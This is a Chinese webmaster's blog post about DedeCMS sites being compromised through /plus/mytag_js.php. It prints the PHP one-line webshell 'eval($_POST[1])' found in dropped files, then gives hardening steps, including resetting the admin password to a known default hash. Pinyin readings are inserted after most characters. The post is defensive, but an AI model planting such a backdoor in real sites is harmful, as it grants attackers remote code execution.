網站建設

dedecms一(yī / yì ／yí)直是(shì)很火的(de)建站cms，主要(yào / yāo)得益于(yú)兩大(dà)站長網的(de)鼎力支持;不(bù)過，人(rén)火是(shì)非多，cms太火了(le／liǎo)同樣會被别有用心的(de)人(rén)盯上(shàng)。我的(de)網站一(yī / yì ／yí)直在(zài)使用dedecms，前段時(shí)間又一(yī / yì ／yí)次受到(dào)攻擊，攻擊的(de)目的(de)很簡單，那麽便是(shì)黑鏈，知道(dào)後稍微修改下代碼就(jiù)恢複了(le／liǎo)，不(bù)是(shì)很嚴重;這(zhè)段時(shí)間網站又被莫名上(shàng)傳文件，類似前一(yī / yì ／yí)次，雖然對方還沒來(lái)得及修改網站模闆，不(bù)過這(zhè)說(shuō)明網站安全防患還未到(dào)位，對方任何時(shí)候都可能再次取得管理員權限，所以(yǐ)要(yào / yāo)特别注意網站的(de)安全防患措施。

因爲(wéi / wèi)我比較喜歡尋根究底，所以(yǐ)就(jiù)去網上(shàng)找了(le／liǎo)一(yī / yì ／yí)下相關的(de)資料，發現這(zhè)确實是(shì)dedecms的(de)漏洞，黑客可以(yǐ)利用多維的(de)變量繞過正則檢測，漏洞主要(yào / yāo)發生在(zài)/plus/mytag_js.php中，原理便是(shì)準備一(yī / yì ／yí)個(gè)MySQL數據庫來(lái)攻擊已知網站的(de)數據庫，通過向數據庫中寫入一(yī / yì ／yí)句話的(de)代碼，隻要(yào / yāo)成功寫入，那麽以(yǐ)後便可以(yǐ)利用這(zhè)些代碼來(lái)獲得後台管理員權限。

結合我的(de)網站被攻擊已經别人(rén)類似的(de)經曆來(lái)看，黑客寫入的(de)文件主要(yào / yāo)存在(zài)于(yú)/plus/文件夾下，目前已知的(de)幾個(gè)文件包括ga.php、log.php、b.php、b1.php等，文件的(de)特征便是(shì)短小，内容很少，可能寫入的(de)時(shí)候不(bù)是(shì)很方便，不(bù)過這(zhè)些代碼的(de)作用确實不(bù)小的(de)。

下面這(zhè)是(shì)ga.php文件中的(de)部分代碼：

no

eval($_POST[1])

?>

no

eval($_POST[1])

?>

no

eval($_POST[1])

?>

實際的(de)代碼比上(shàng)面截取的(de)要(yào / yāo)長，不(bù)過都是(shì)這(zhè)段代碼的(de)重複，至于(yú)log.php的(de)代碼，同這(zhè)個(gè)類似，隻有一(yī / yì ／yí)句話，簡單明了(le／liǎo)，如果你對網絡安全稍有了(le／liǎo)解，那麽會知道(dào)是(shì)php一(yī / yì ／yí)句話木馬，使用部分指定的(de)工具可以(yǐ)執行這(zhè)段代碼，預計是(shì)破解密碼的(de)功能。

既然已經知道(dào)對方是(shì)利用什麽樣的(de)漏洞，同時(shí)知道(dào)對方利用什麽樣的(de)原理來(lái)利用漏洞，那麽要(yào / yāo)怎麽預防這(zhè)些危險的(de)事發生呢?經過查詢大(dà)量的(de)資料，我初步整理出(chū)下面這(zhè)些預防漏洞被利用的(de)步驟，希望對同樣适用dedecms的(de)站長朋友們有所幫助。

一(yī / yì ／yí)、升級版本打好補丁設置目錄權限

這(zhè)是(shì)官方對此的(de)解決辦法，不(bù)管你使用的(de)是(shì)什麽版本的(de)dedecms，都要(yào / yāo)及時(shí)在(zài)後台升級版本自動更新補丁，這(zhè)是(shì)避免漏洞被利用的(de)最重要(yào / yāo)的(de)一(yī / yì ／yí)步;同時(shí)官方還提供設置目錄的(de)方法，主要(yào / yāo)是(shì)設置data、templets、uploads、a爲(wéi / wèi)可讀寫不(bù)可執行權限;include、member、plus、後台管理目錄等設置爲(wéi / wèi)可執行可讀不(bù)可寫入權限;删除install及special目錄，具體如何設置見官方說(shuō)明。

二、修改admin賬号及密碼

黑客可能是(shì)利用默認admin賬号，随後推測密碼來(lái)破解的(de)，所以(yǐ)修改默認的(de)admin賬号非常重要(yào / yāo)，至于(yú)如何修改，方法很多，比較有效的(de)是(shì)用phpadmin登陸網站數據庫，找到(dào)dede_admin數據庫表(dede是(shì)數據庫表前綴)，修改其中userid及pwd兩項，其中密碼一(yī / yì ／yí)定要(yào / yāo)修改成f297a57a5a743894a0e4，這(zhè)是(shì)默認的(de)密碼admin;修改後去後台登陸，登陸dede後台後修改密碼。

三、别的(de)值得注意的(de)地(dì / de)方

至于(yú)更多的(de)細節，同樣要(yào / yāo)注意，盡量别選擇太廉價的(de)空間，太廉價的(de)空間很容易出(chū)現服務器本身的(de)安全問題，隻要(yào / yāo)服務器出(chū)現問題，整個(gè)服務器下面的(de)網站都沒救了(le／liǎo)。還有便是(shì)，如果沒必要(yào / yāo)，盡量别開通會員注冊什麽的(de)，使用起來(lái)很麻煩;至于(yú)網站後台目錄，不(bù)要(yào / yāo)寫到(dào)robots.txt裏面，同時(shí)每個(gè)月至少換一(yī / yì ／yí)次，管理員密碼什麽的(de)同樣要(yào / yāo)更換，避免和(hé / huò)别的(de)賬号密碼相同被推測出(chū)來(lái)。

經過這(zhè)幾次網站被攻擊的(de)實例，不(bù)得不(bù)說(shuō)，互聯網不(bù)是(shì)一(yī / yì ／yí)個(gè)可以(yǐ)安心睡大(dà)覺的(de)網，作爲(wéi / wèi)站長，算是(shì)織網的(de)人(rén)，更應該注重網絡安全;隻要(yào / yāo)按照要(yào / yāo)求去做到(dào)了(le／liǎo)這(zhè)些防範措施，不(bù)說(shuō)100%，至少95%的(de)可能不(bù)會被順利取得後台權限。